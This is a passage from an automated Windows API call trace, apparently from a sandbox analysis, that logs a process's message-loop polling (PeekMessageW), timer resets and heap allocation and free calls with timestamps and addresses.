lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.714] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.715] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.716] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.716] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.231] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0130.231] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0130.231] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0130.231] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0130.231] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0130.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0130.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0130.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0130.232] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0130.233] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0130.233] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.233] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0130.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0130.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0130.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0130.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0130.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0130.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0130.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0130.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0130.237] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0130.237] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0130.237] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0130.237] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0130.238] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x100) returned 0x1311208 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0130.238] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.238] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.238] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0130.238] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0130.239] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.239] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0130.239] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0130.239] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.239] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.239] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe80 [0130.239] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.239] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0130.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0130.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0130.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0130.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0130.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0130.241] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0130.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.241] HeapFree (in: 